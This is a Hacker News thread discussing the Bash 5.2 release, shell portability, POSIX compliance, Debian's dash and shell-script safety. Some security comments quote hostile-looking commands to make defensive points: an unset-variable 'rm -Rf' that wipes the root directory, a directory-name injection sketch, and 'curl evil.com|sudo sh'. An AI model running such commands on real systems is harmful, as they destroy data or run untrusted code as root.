Bash 5.2 (case.edu)
185 points by RealAlexClay on Sept 27, 2022 | 123 comments


I had the pleasure of having the original writer of Bash, Brian Fox, at my programming language class in college one time. He was so pleasantly humble. I'll never forget how he said he wrote everything as simply as possible. Gem of a guy


Wow. It's scary to think what if he didn't


We'd be using Ash or Korn


When I've tried it, ksh has seemed decent. I don't know, however, whether that would have been true regardless or if it benefited from competition.


The POSIX shell actually devolved from Korn and bash.

ksh88 worked very hard to keep its data segment under 64k so it would work on Xenix running on a 286 and similarly constrained systems. The code went through spaghetti gymnastics to achieve this.

The POSIX shell standard removed many features of the ksh88 language. It appears that this was done in an attempt to maintain a small footprint and to clarify the code.

This is good for embedded systems, but bad if you need arrays.


As cliche as it sounds, you just kinda had to be there.


In the sense that bash was better than ksh in a way that's difficult to articulate?


More in the sense that at-the-time 'modern'[0] Linux embraced a new set of tools that displaced/subverted those we used on other systems at the time. They can't really be compared in isolation, because that ignores a lot of the chronological nuance of the situation. It's not that one shell or one OS was better than the other, though there are objective measurements for one vs. the other; it's the culmination of the social factors surrounding those shifts that resulted in what we now see as the 'better' tool coming out on top. We also can't disregard the ancillary effects of being the favored shell on what is now the favored platform: more eyes, more users, and more mindshare all helped to accelerate it to where it is now.

I hope that hits the notes you were listenin for.

[0] When I say 'modern' I'm not referring to the Ubuntus and GUI-first distros that we know today.


Humble is not a word that comes to mind when thinking of Brian. Epic-troll is maybe a better one. Now he has pivoted to crypto-coin pumper.


i bet he's a man of multitudes


And I went to school (Case) with the other half of Bash, Chet Ramey. I think Brian focused more on Readline and Chet was more on Posix.


Woah nice.

I use Zsh most of the time, but the OGs of *NIX and POSIX/C bring back the mindset of portability and simplicity. If only we could've leapt from FORTRAN to Rust and skipped C and C++. ;)


That was Ada in 1983. :)


Bash nowadays is developed in git, which is nice. Good luck finding incremental changes, though:

https://git.savannah.gnu.org/cgit/bash.git/commit/?id=74091d...

https://git.savannah.gnu.org/cgit/bash.git/commit/?id=8868ed...

https://git.savannah.gnu.org/cgit/bash.git/commit/?id=d233b4...

(To be fair, there are a few smaller patchsets besides these huge dumps, and it does have good documentation and a changelog file.) This alone was enough to push me towards fish for my interactive shell needs.


I quickly found the details on a branch called devel.

It looks like Ramey is doing rebasing merges with squashing to get changes into the trunk.

Moreover, there is an intermediate 5.2-test branch which doesn't have the detailed commits, but is less squashed; it has the 5.2 intermediate pre-releases that were put out for testing.

So there is a method to the madness, though I can't personally agree with anything except all changes on one straight line that you can git bisect with your eyes closed. All those items like 5.2 prerelease 3 can just be tags on one trunk.

Here is a problem: the devel branch has no tags indicating where the various intermediate releases were cut. Likewise, the squash merge commits do not list, in the commit message, the range of commits that were included.


Wow, thanks for the pointer to the devel branch. I retract some of my criticism; this seems to be done fairly properly (except in 2021, when I looked, the commits were basically time dumps). I don't get the need to squash though.


I'm going to open an outright bug on Savannah for this. It's a process problem in the Bash project that I can't go into the detailed devel branch where the actual commits are, and tell which commits have gone into specific test baselines and releases.

https://savannah.gnu.org/support/index.php?110734




For bash users who are tempted by zsh interactive "fuzzy" completion, here's my take on it: it's directory-aware (offering different suggestions based on your history of commands in that given directory), pure bash code using sqlite to store data: https://github.com/csdvrx/bash-timestamping-sqlite

The only other dependency is fzy for fuzzy matching.


Nice, there's also ble.sh -- a readline replacement for bash that has zsh/fish-like syntax colors and completion. It is actively developed, and the maintainer has implemented two features I requested in a matter of hours.

If you want to check it out: https://github.com/akinomyoga/ble.sh

(Still, I personally believe these features are overrated and don't actually bring more usability or comfort to the command line experience. For instance, ctrl+r kills the need for suggestions, and instead of scrolling through files with your fingers to select one, you can select it with your eyes.)


> there's also ble.sh

I tried. It was a source of inspiration for the looks, because it looks really nice!

However, due to some design decisions, ble.sh is slow to the point of being unusable on some hardware I use, including a modern laptop running msys2 instead of WSL2.

> For instance, ctrl+r kills the need for suggestions

Use both: seed your history search with the path and a few keywords, then sort by how often each entry was the correct or successful completion in the past (meaning it gave you a non-error return code).


> slow to the point of being unusable

ble.sh has a vast array of configuration options. By disabling features I didn't like or need I was able to make it run pretty fast and responsive.


Interesting. Maybe I should have tried to configure it better?

In the end, doing a rewrite of the core features allowed me to fine tune the technical choices to work extremely well on Windows (where fork is slow) while adding SQL for both the command history and query format, so hopefully I didn't just reinvent the wheel :)


Most of the slowness with these things comes from the fact that processes are very heavy on Windows compared to Linux and take a while to launch.


I’ve asked before on HN and will ask again: I’m sure a bash core dev said something along the lines of ‘if you want a secure shell don’t use bash’. I’d love to see the original quote and its context so I can cite it formally.

To be clear, I think this was in reference to shell shock and not a generic statement. Bash has its place, I think everyone agrees that place isn’t cgi scripts though.


if you want a secure shell don’t use bash

I do not expect a shell to be secure. In my opinion that is the job of mandatory access controls, sandboxes, chroot jails, setcap, posix permissions, etc... and of course the job of the script author.

I do however try to follow some best practices in shell scripting to minimize mistakes and to avoid mistakenly executing the wrong resources. A good start is ShellCheck [1], available as a command-line tool in most distro repositories. ShellCheck has corrected some of my old bad habits. In the cases where I disagree with a ShellCheck finding, there are options that can be added as comments to scripts to ignore specific checks.

Speaking of security and mistakes, one common mistake I see in scripts is to leave out "set -u" in bash scripts. I actually wish that were default and that one had to disable it when required and it is sometimes required. This would prevent many accidental incidents of data loss. e.g.

    rm -Rf ${basedir}/*  # yeah nobody should do this but it happens, sometimes with sudo.
If the variable basedir is not set, bash will interpret that as rm -Rf /* whereas with 'set -u' in place there will be an error and the script will exit. This is similar to one of the checks in Perl's taint mode.
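A minimal sketch of the difference (hypothetical basedir variable; echo stands in for rm so the example is safe to run):

    #!/usr/bin/env bash
    set -u    # expanding an unset variable is now a fatal error
    # Without set -u, an unset $basedir expands to the empty string and the
    # command below would effectively become "rm -Rf /*".
    echo "would run: rm -Rf ${basedir}/*"   # with set -u: "basedir: unbound variable", script exits
    # ${var:?message} guards a single expansion even without set -u:
    # rm -Rf "${basedir:?basedir is not set}"/*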

[1] - https://www.shellcheck.net/


> I do not expect a shell to be secure.

You should. The example with "rm -Rf" is a problem of ergonomics/usability; what would be far scarier is, e.g., if the shell had an arbitrary code execution vulnerability in its path processing code.

    $ /bin/sh

    $ cd /some/path+evilmagic+'echo pwned!'  # that's just a normal directory name, allowed by POSIX

    $ /bin/vulnsh  # prints "pwned!"


Those are interesting theoretical examples of phishing or backdoors and they have probably occurred at some point. I've moved away from trying to mitigate theoretical threats and instead I prefer to focus on risk ranking by feasibility or probability based on the potential impact. I believe the onus is on me to review a script and understand it prior to execution and report malicious scripts.

If my job was to mitigate theoretical attacks then I would require everyone to run scripts in highly restricted sandboxes that log the obfuscated behavior. This is probably something that build automation systems should be doing regardless for all scripts and compiled code to detect things like backdoored NPM packages which is all the rage these days. I would also like to see multipurpose repository systems like Github and Gitlab perform these sandboxed tests, rating scripts and compiled code with behavioral risk scores.

I am mostly content with the current status of Bash security and the toggles it gives me to control behavior. There are some things I would prefer defaulted on but I understand why they do not.


These concerns are not theoretical. Complex software has bugs, and Bash doesn't have a perfect track record. https://en.wikipedia.org/wiki/Shellshock_(software_bug)

While my path processing scenario is hypothetical, you shouldn't need additional sandboxing to merely browse the local filesystem. You should trust tar not to overwrite files outside cwd. You should trust ls not to execute arbitrary code when listing a directory. You should trust the TCP/IP stack not to cause a kernel panic when a malformed ping shows up at your NIC. There's a huuuge difference between that and "curl evil.com|sudo sh".


The grammar of the POSIX shell (and derivatives) is not an LR-parsed language that can be implemented with yacc.

It requires an advanced parser.

There is an effort in OCaml (and another in Ada) to create a formal and secure parser. They remark that dash uses a handcrafted parser in C that cannot be formally verified.

https://archive.fosdem.org/2018/schedule/event/code_parsing_...

https://archive.fosdem.org/2019/schedule/event/ada_shell/


cgi scripts... now that's a name I haven't heard in a long time...


i disagree. My webserver is written in bash.


Ah yes, one self certified ‘secure’ app proves the language is secure.

I think you'll have a hard time arguing that a weakly typed, structureless, idiosyncratic language is secure.


it is never the language, it's the implementation. But y'all software "engineers" parrot the same shite since 1989


@jhamby on Twitter is currently refactoring bash into C++, and it's really interesting to read his anecdotes about the progress. It's a really interesting codebase.


link to in-progress source?



why not rust?

(sorry, I had to)


Rust isn't quite portable enough yet. There are lots of small environments and specialized gcc-based toolchains that will compile bash just fine, but once you require Rust, you're eliminating architectures like Alpha (which includes familial descendants like the Shenwei architecture in the Sunway TaihuLight), m68k, SuperH and others.

Rust is getting better, but they're not quite there yet.


c2rust https://github.com/immunant/c2rust :

> C2Rust helps you migrate C99-compliant code to Rust. The translator (or transpiler), c2rust transpile, produces unsafe Rust code that closely mirrors the input C code. The primary goal of the translator is to preserve functionality; test suites should continue to pass after translation.

crust https://github.com/NishanthSpShetty/crust :

> C/C++ to Rust transpiler

"CRustS: A Transpiler from Unsafe C to Safer Rust" (2022) https://scholar.google.com/scholar?q=related:WIDYx_PvgNoJ:sc...

rust-bindgen https://github.com/rust-lang/rust-bindgen/ :

Automatically generates Rust FFI bindings to C (and some C++) libraries

nushell/nushell looks like it has cool features and is written in rust.

awesome-rust > Applications > System Tools https://github.com/rust-unofficial/awesome-rust#system-tools

awesome-rust > Libraries > Command-line https://github.com/rust-unofficial/awesome-rust#command-line

rust-shell-script/rust_cmd_lib https://github.com/rust-shell-script/rust_cmd_lib :

> Common rust command-line macros and utilities, to write shell-script like tasks in a clean, natural and rusty way


hey thanks for this I didn't know it existed. I'm still kind of a rust noob and working my way through Rust in action and various examples.


FYI, I wouldn't recommend browsing that guy's feed. He has some strange posts on it.


FYI ... I probably never would have gone to look if not for your warning.

https://en.wikipedia.org/wiki/Streisand_effect


That doesn't apply. Streisand effect is for people who want to suppress something. I don't care if you look at that Twitter. I just know that I found it unpleasant, so was just putting a warning out for others.


His posts seem sane to me. The sheer volume of them is a bit weird though.


You would recommend against browsing his feed because some of his posts are "strange"?

Seems like an unnecessary callout.


Thanks for your opinion. Am I allowed to have one as well?


Recommending that other people avoid a certain page because it contains "strange posts" without further elaboration is definitely inviting the "unnecessary callout" remark.

As HackerNews is a discussion site, not your personal blog, some further elaboration on why you consider the guy's posts "strange" (and why you even consider "strange" being a bad thing in itself) would be in order.


You've been quite unspecific in expressing your opinion: how can we evaluate your suggestion of not browsing that guy's feed without actually browsing it to find out what "strange posts" means to you?


what if I find svnpenn strange for such an unspecified callout? Is that wrongthink if I'm unable to get svnpenn's approval?


yes


They are protected, did they just go now?


> a. The bash malloc returns memory that is aligned on 16-byte boundaries.

Why the heck does bash need malloc?


One answer is that it's a tradition for C programs to roll their own malloc.


For systems without one provided.


Maybe I'm misunderstanding the note. Does this mean that the bash source code (written in C, I assume) now uses its own `malloc` function instead of what is provided by the standard C library? Or is it saying that `malloc` is a command I can call in bash?

I assumed the latter, and couldn't figure out why I would need to manually allocate memory in a shell script.


There’s no malloc bash command.

The idea is that you don’t need C libraries to run/compile bash.


I don't think you can compile bash without a libc. The idea is that back in the day systems didn't always come with a good malloc, so bash provided its own. These days, you want --without-bash-malloc on pretty much all modern systems (where "modern" means "last 20 years").

It was a good idea 30+ years ago, maybe. It's really old and crufty code; last time I checked it's all in pre-ANSI C and with workarounds for platforms like 1980s Xenix.
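For example, a sketch of configuring a build against the system allocator (--without-bash-malloc being the standard autoconf negation of --with-bash-malloc):

    ./configure --without-bash-malloc   # use the C library's malloc instead of lib/malloc
    make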


Yes, I think this is accurate:

https://www.gnu.org/software/bash/manual/html_node/Optional-...

> --with-bash-malloc

> Use the Bash version of malloc in the directory lib/malloc. This is not the same malloc that appears in GNU libc, but an older version originally derived from the 4.2 BSD malloc. This malloc is very fast, but wastes some space on each allocation. This option is enabled by default. The NOTES file contains a list of systems for which this should be turned off, and configure disables this option automatically for a number of systems.

> --with-gnu-malloc

> A synonym for --with-bash-malloc.

http://git.savannah.gnu.org/cgit/bash.git/tree/NOTES?h=devel

> Platform-Specific Configuration and Operation Notes [very dated]

> 1. configure --without-gnu-malloc on:

> alpha running OSF/1, Linux, or NetBSD (malloc needs 8-byte alignment;

> bash malloc has 8-byte alignment now, but I have no alphas to test on)

> next running NeXT/OS; machines running Openstep

> all machines running SunOS YP code: SunOS4, SunOS5, HP/UX, if you have problems with username completion or tilde expansion for usernames found via YP/NIS

> linux (optional, but don't do it if you're using Doug Lea's malloc)

> QNX 4.2

> other OSF/1 machines (KSR/1, HP, IBM AIX/ESA)

> AIX

> sparc SVR4, SVR4.2 (ICL reference port)

> DG/UX

> Cray

> Haiku OS

> NetBSD/sparc (malloc needs 8-byte alignment; bash malloc has 8-byte alignment now, but I have no NetBSD machines to test on)

> BSD/OS 2.1, 3.x if you want to use loadable builtins

> Motorola m68k machines running System V.3. There is a file descriptor leak caused by using the bash malloc because closedir(3) needs to read freed memory to find the file descriptor to close


Doesn't this increase scripts' attack surface?


Does anyone have a TLDR of major changes or fixes?


The most notable new feature is the rewritten command substitution parsing code, which calls the bison parser recursively. This replaces the ad-hoc parsing used in previous versions, allows better syntax checking, and catches syntax errors much earlier.

The shell attempts to do a much better job of parsing and expanding array subscripts only once; this has visible effects in the `unset' builtin, word expansions, conditional commands, and other builtins that can assign variable values as a side effect.

The `unset' builtin allows a subscript of `@' or `*' to unset a key with that value for associative arrays instead of unsetting the entire array (which you can still do with `unset arrayname').

There is a new shell option, `patsub_replacement'. When enabled, a `&' in the replacement string of the pattern substitution expansion is replaced by the portion of the string that matched the pattern. Backslash will escape the `&' and insert a literal `&'. This option is enabled by default (see the example below).

Bash suppresses forking in several additional cases, including most uses of $(<file).
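A quick illustration of the new patsub_replacement option (a sketch, assuming an interactive bash 5.2 with default settings):

    $ str="foo bar"
    $ echo "${str/bar/<&>}"        # '&' expands to the text that matched the pattern
    foo <bar>
    $ echo "${str/bar/<\&>}"       # a backslash escapes it, inserting a literal '&'
    foo <&>
    $ shopt -u patsub_replacement  # disable the new behavior if it breaks old scripts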


That's literally what the link gives! :)


Well, they asked for a TL;DR. The link is three pages of dense text, and much of it isn't major changes. Seems reasonable to ask for a summary of the big changes.


Isn't it what the link provides?


Improvements are always nice, but portability matters, so depending on new features isn't possible until they can safely be assumed to be ubiquitous (cough, not you Apple).

Then there's the part where building anything of significant complexity is probably not a good idea in a shell script.


If portability is your primary concern, then you want a POSIX shell, or at least to ensure that your bash is always in POSIX mode. There are lots of behavior differences when bash's POSIX mode is set.
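For reference, a sketch of the usual ways to put bash into POSIX mode (all documented in bash(1)):

    bash --posix script.sh            # command-line switch
    set -o posix                      # toggle it inside a running shell
    POSIXLY_CORRECT=1 bash script.sh  # setting this in the environment at startup also enables it
    # invoking bash under the name "sh" likewise enables POSIX mode after startup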

Debian brought the Almquist shell in as /bin/sh, and is maintaining it with strict compliance to POSIX. This displaces bash as the system shell, but bash is still assigned as the interactive shell.

http://gondor.apana.org.au/~herbert/dash/

This is an older standard for the behavior of the POSIX shell. There are many common shell features that are not here (arrays, networking, coprocesses, fancy substitution, and much more). Doing without them increases portability.

https://pubs.opengroup.org/onlinepubs/9699919799/utilities/V...


In my view, Debian boiled an ocean for no discernible gain and caused a lot of trouble for everyone in the process. Fedora uses bash, and I hope we continue rejecting the mistake Debian made.


If you want to write scripts to target bash, target bash with your shebang.

If your shebang is `/bin/sh`, then it's nice to have a strictly POSIX-compliant shell.


Bash does not "turn off" all its extra functionality when called as /bin/sh; it just alters the behaviors that are clearly in conflict with (what was) POSIX.2.

Arrays are still available in POSIX mode, even though they do not comply.
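A quick check of that (a sketch with a throwaway array):

    $ bash --posix -c 'a=(one two three); echo "${a[1]}"'
    two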


Which is why I think it’s good that Debian has a POSIX-strict `/bin/sh`. I have no idea what bash’s flawed POSIX mode has to do with this.


Except when a program calls system(3), which always uses /bin/sh. I maintain many core Linux packages and this Debian nonsense is a constant irritation with no discernible benefit.


If it doesn’t work with ‘this Debian nonsense’, you’re doing it wrong and you’re contributing to a bad faux dependency on bash as /bin/sh.

The Unix world is better off if there is the option of using another shell that isn’t bug for bug compatible with bash.

This behavior is what leads to systems that have to emulate ancient bloated interfaces because they need to support applications that use apis that are defined as ‘how that program does it’. That’s bad. We should avoid it. Avoiding it is a benefit.


One secondary reason for the dash choice is speed.

The dash shell has been reported to be four times faster than bash.

That definitely impacts boot time. POSIX compliance is not the only benefit.


system("/usr/bin/env bash -c '...'");


Debian dash is useful to keep my scripts honest.

Busybox actually takes dash and then sprinkles a few bash/korn features back onto it (notably, not arrays).

If you want a lot of people to use your scripts, getting them working in dash can help a great deal.

The POSIX mode in bash exists because bash itself predates POSIX by nearly a decade.


What does "keep my scripts honest" even mean? Just use bash and don't make everyone else boil your ocean.

It's like saying you'll never use any Linux feature except those strictly defined by POSIX.1. Why would you do that?


Android uses mksh. If I write a script that uses read -p to present a prompt, it will fail on Android because -p means "read from the co-process" in mksh (see the sketch below).

The fundamental reality is that GPL does not run on iOS or Android (in userland). If you want to run scripts on those platforms (and they are ENORMOUS), then you cannot use bashisms.

Full stop.
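A minimal sketch of that read -p difference (hypothetical prompt text):

    # bash: -p prints a prompt before reading; mksh: -p means "read from the co-process"
    read -p "Continue? [y/N] " answer

    # portable POSIX equivalent:
    printf 'Continue? [y/N] ' >&2
    read answer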


Note: BusyBox has two shell implementations in it, selected at compile time.


Are you building scripts for the Debian distro? Given that they already include bash and actually support it for interactive use, what would be the issue with scripting in bash? I am sure that the experience of moving to dash wasn't fun at all, but users in general are not affected that much, as far as I understand.


I'm maintaining a bunch of core Linux packages which have had to make many adjustments over the years to deal with this Debian nonsense. I can see no justification for it, since Fedora is using bash just fine and doesn't have to deal with this.


I definitely feel great sympathy for your position.


>There are lots of behavior differences when bash's POSIX mode is set.

AFAIU, correct POSIX scripts will behave correctly in Bash's POSIX mode. Incorrect POSIX scripts, however, may not misbehave in Bash's POSIX mode the way they would under a more faithful shell implementation.

IMO Bash's POSIX mode is not a problem for running scripts, although you should test your scripts with a strictly compliant shell implementation if you then distribute those scripts to other users/platforms.


Serious question, why should I care about portability to Apple in shell scripts?

Why not make all your shell scripts #!/bin/bash and anything where that doesn't work is trying to be a second class citizen[1] in unix and so maybe let them? Or tell users to install Bash - which they can probably do if they're using shell scripts..?

[1] Or maybe deliberately trying to break portability by market power abuse.

I know I don't need to tell anybody here that Apple is not their friend, merely a supplier who will maximize their revenue at your expense when it suits them.


> Serious question, why should I care about portability to Apple in shell scripts?

It depends on your target audience, of course, but Darwin is one of the major current OSs and wanting to support it is reasonable.

> Why not make all your shell scripts #!/bin/bash and anything where that doesn't work is trying to be a second class citizen[1] in unix and so maybe let them? Or tell users to install Bash - which they can probably do if they're using shell scripts..?

Well, for starters AFAIK /bin/bash on Darwin will give you bash 3.2, which is a bit old and feature-poor. Of course you can (and perhaps even should) simply install a new version but then it won't be at /bin/bash, it'll be under /usr/local or /opt or whatever. And BASH isn't POSIX so I'd personally argue that trying to force it makes your stuff the "second class citizen in unix".

Honestly I'm not sure what position you're trying to argue. "Ignore the second biggest desktop OS because they don't ship the latest version of the non-standard scripting language I like"?


>"Ignore the second biggest desktop OS because they don't ship the latest version of the non-standard scripting language I like"?

There's nothing wrong with that position. Bash is not a "non-standard scripting language people like"; it is the de-facto standard on Linux (heck, it was the first program Torvalds ever ran on Linux) and the most widespread implementation of the POSIX shell in the world. If Apple chose tivoization[1] over freedom, then I can choose the #!/bin/bash shebang.

[1] https://en.m.wikipedia.org/wiki/Tivoization


> Bash is not a "non-standard scripting language people like", it is the de-facto standard on Linux (heck, it was the first program Torvalds ever run on Linux)

That sounds like the definition of not being standardized. BASH is the most common shell implementation on GNU systems (no, not Linux; Alpine is a Linux, and so is Android), but that doesn't make it a standard, only common. It's like claiming that nobody should care about anything but Chrome because it's "the de-facto standard".

> and the most widespread implementation of POSIX shell in the world.

BASH can run POSIX sh scripts, but POSIX sh can't run BASH scripts. If you're only using POSIX features, then it's not a problem, but if you're only using POSIX features we wouldn't be having this argument.

> If Apple chosed tivoization[1] over freedom, so I can choose the #!/bin/bash shebang.

Could I at least talk you into using `#!/usr/bin/env bash` so your scripts will work on a wider slice of the Linux universe? Even on Linux distros that exact path isn't a given (guix and nix send their regards), and you're completely breaking compatibility with the BSDs and illumos distros.


> Could I at least talk you into using `#!/usr/bin/env bash` so your scripts will work on a wider slice of the Linux universe? Even on Linux distros that exact path isn't a given (guix and nix send their regards), and you're completely breaking compatibility with the BSDs and illumos distros.

You're also breaking compatibility with newer versions of bash on macOS that almost definitely wouldn't be installed at /bin/bash. I use 5.2 from brew.


bash isn't POSIX???

if bash isn't POSIX then wth is? If you told me "British English isn't actually English" I'd be less surprised than by bash and POSIX.


> bash isn't POSIX???

No

> if bash isnt posix then wth is?

POSIX sh (https://pubs.opengroup.org/onlinepubs/9699919799/utilities/V...).


POSIX defines a shell that's not completely compatible with Bash. IIRC Ubuntu's `sh` command actually runs bash in a special "POSIX-compatible" mode that's really bare-bones.


> Why not make all your shell scripts #!/bin/bash

Because it's not always installed there. See, for example, FreeBSD where bash typically lives in /usr/local/bin/bash. Or in the Linux world, Nix and Guix.

Use "#!/usr/bin/env bash" to account for all these possibilities.


If we're going to be pedantic, env doesn't have to be installed at /usr/bin/env either. See https://www.felesatra.moe/blog/2021/07/03/portable-bash-sheb...


I can't remember where I saw it now, or what the main argument was, but I remember reading a rather authoritative article recommending against the env approach and recommending people stick to #!/bin/bash regardless of the above, otherwise valid, point.

Dunno if anyone here with a better memory remembers the article to link here ...



You should care about POSIX Shell Command Language compatibility because targeting anything above that will eventually require you to do more, not less, work.

If you haven't run into this, you just haven't written enough for the shell yet.

Once you run into it, you'll not want to write anything specifically for Bash or Zsh anymore unless you know beyond a shadow of a doubt that it will never be run in any other shell.


Nearly all of the shell scripts ever written don't need to run on Linux, and BSD, and Mac, and/or whatever esoteric Unixes are still out there.

If you are writing a shell script with the intention of running in many places, fine.

But if you do that, the POSIX compatibility will be the least of your worries.


A few "gotchas:"

I will commonly "alias p=printf" in my shell scripts. This is fine in Almquist and bash when called as /bin/sh, but if called as /bin/bash it fails, because bash only honors aliases in POSIX mode.

In bash, reading with a prompt can be done with "read -p prompt var" but this fails in Korn because it's used for coprocesses. This means that your shell script will not run on Android, because mksh is the system shell.

I could probably think of a few more with some effort, and especially a check of the man pages.

p.s. I didn't downvote you.


> bash only honors aliases in POSIX mode.

Aliases certainly _work_ in bash (even when not in POSIX mode). What do you mean by "honors"?


Bash will not expand aliases within a shell script unless it is in POSIX mode.

When not in POSIX mode, aliases are only expanded for interactive use.

  $ printf '%s\n' '#!/bin/sh' 'alias p=printf' 'p "%s\n" "hello world!"' > ok.sh
  $ chmod 755 ok.sh
  $ ./ok.sh
  hello world!

  $ printf '%s\n' '#!/bin/bash' 'alias p=printf' 'p "%s\n" "hello world!"' > nope.sh
  $ chmod 755 nope.sh
  $ ./nope.sh
  ./nope.sh: line 3: p: command not found


Wat? I suggest leaving such emotions out of your choice of programming languages and other decisions that should be dictated by rationality. Not adhering to POSIX shell syntax buys you very, very little, but can create problems down the road. Bash isn't even the standard non-interactive shell on mainstream Linuxen (e.g. Debian uses dash [1]), and zsh is not used only on macOS.

[1]: https://wiki.debian.org/Shell


Serious answer, because I have users/customers who I care about that use that platform, and sometimes I use it myself. A world built on absolutes falls to pieces really quickly.


It's okay. Portability depends on the behavior of the developers on average, not the rate of new features added to a language. Bash developers are generally conservative and not going to be using the newest backwards incompatible features for at least a decade. Whereas, say, Rust dev demographics are more bleeding edge types and when they get new features they use them immediately.

That's why bash scripts can be interpreted on any OS from 1995 to now, while Rust can only be compiled on an OS that has updated its rustc in the last 3 months.

Gotta hand it to Bash devs. They do a good job.


> That's why bash scripts can be interpreted on any OS from 1995 to now and Rust can only be compiled on an OS which has updated it's rustc in the last 3 months.

You can get the same effect by trying to run scripts with bash 5.x features on a version of bash from 1995.

Rust code since 1.0 has the same level of backwards compatibility that bash does.


>Rust code since 1.0 has the same level of backwards compatibility that bash does.

That's true and exactly what I said. It's the rust developer demographic that lacks the consideration to write backwards compatible code.


I'm not sure the message is being conveyed properly -- looking up the GNU archive, it seems Bash 1.14 was the current release in 1995. Are people still making sure their scripts are compatible in Bash 1.14? Surely there's a subset of scripts that happen to work, but with numerous features that have been added since, there are plenty of scripts that won't.

Backwards compatibility isn't really about whether you can run code on _old versions_, but if you can run _old code_ on new versions. Scripts that were written with Bash 1.14 should work today (barring all the other external dependencies they may have...), but scripts that are written today won't necessarily work on 1.14.

That's the same as the Rust analogy: code written with Rust 1.0 should compile and run today, but code written today won't necessarily work on Rust 1.0 (albeit, there must be a subset of new code that would happen to work).


>Backwards compatibility isn't really about whether you can run code on _old versions_, but if you can run _old code_ on new versions.

Ah, sorry, I guess I mean forwards compatibility then: the ability to interpret/compile code written by devs today on machines with software from years ago (or months ago, in Rust's case).


For several projects, we simply define bash as a required dependency. All the bash scripts use "#!/usr/bin/env bash". Not had any issues with portability between versions of bash, and basically every platform we care about has bash at least as an alternative if not the default.


There are circumstances in which portability is not required. People have been writing bash before Apple picked it up and people keep writing bash despite Apple getting sent to GNUlag by GPLv3.


Shared shell-scripts are only one side of the coin. The other is interactive use (incl. one's .bash_profile etc), where it doesn't matter what anyone else's system does or doesn't have installed.


Portability for shell scripts is overrated in 2022.

If your shell scripts are small, it's easy to write several versions of them.

If they are long, you should use something other than shell scripts for your program, like Python.

Worst case scenario, provision the same interpreter everywhere, vendor it, or use a compiled language.

There are some edge cases where portability makes sense (e.g. you are scripting for a heterogeneous fleet of routers), but they are niche usages most companies don't care about.


Because pulling in a huge python installation on small/embedded systems is fun, just because some people are unable to keep their scripts POSIX compliant


Scripting in bash in a portable manner on embedded systems is exactly the niche use case I talked about. The router example is aimed at it, because it's the right size: small, but with a full OS running.

Still, the vast majority of IT projects do not fall into that category.

It exists, but it's a very, very small % of why you need a bash script. And in fact, even those advocating for bash portability almost never fall into the category of people who have to do it in their daily job.

I'll go even further and state that a lot of embedded systems don't even have bash scripting capabilities in the first place.


Tcl, lua, or a lisp/scheme work well here


The nice thing is that many, many shells implement POSIX, so there is enormous portability.

Busybox bundles the Almquist shell, and there is a Windows port available. This is the easiest and least intrusive way to run shell scripts on Windows.

Busybox advertises that it bundles bash, but this is not true - it's Almquist with some added bashisms.

It also bundles its own awk implementation, but not Tcl/lua/lisp/scheme.


It’s not the compatibility which is the problem, but the 3 bugs/line that bash causes.


If you cannot take the time to learn the language, what makes you so confident your python doesn't also have 3 bugs per line as well?


Did you run shellcheck on it, to actually recognize all the errors, before you assumed it is correct?


Writing bash scripts is really not that difficult - despite what folks might want to convince you of.

ShellCheck is a great tool, yes, and can be run natively inside your IDE. Just like any language, you need to learn the language and learn its tools.

Blanket statements like "write all your scripts in python because there's less bugs" really just means the commenter is more familiar with python. Do enough script writing and you'll realize how absurd that statement is.

It's a lot like the folks that scream nobody should ever write a single line of C or C++ because it's "dangerous" - yet untold number of lines of C/C++ are written every day. A pencil can be dangerous in the wrong hands...


Yes I did. And I hope you ran mypy on yours.

BTW both shellcheck and mypy are equally optional, so I'm not sure what your high horse is about.


Well, I use both extensively, and I'm very confident that I can write a 1000-line script with far fewer bugs and much better error handling than in bash, in half the time it would take me.

In fact, as soon as you need to use arrays, it's game over.


1000 lines in python is a bash oneliner and planning for failure is bad design.

>In fact, as soon as you need to use arrays, it's game over.

Why?

PS. comfortable with both. I don't draw lines based on LOC or arrays.



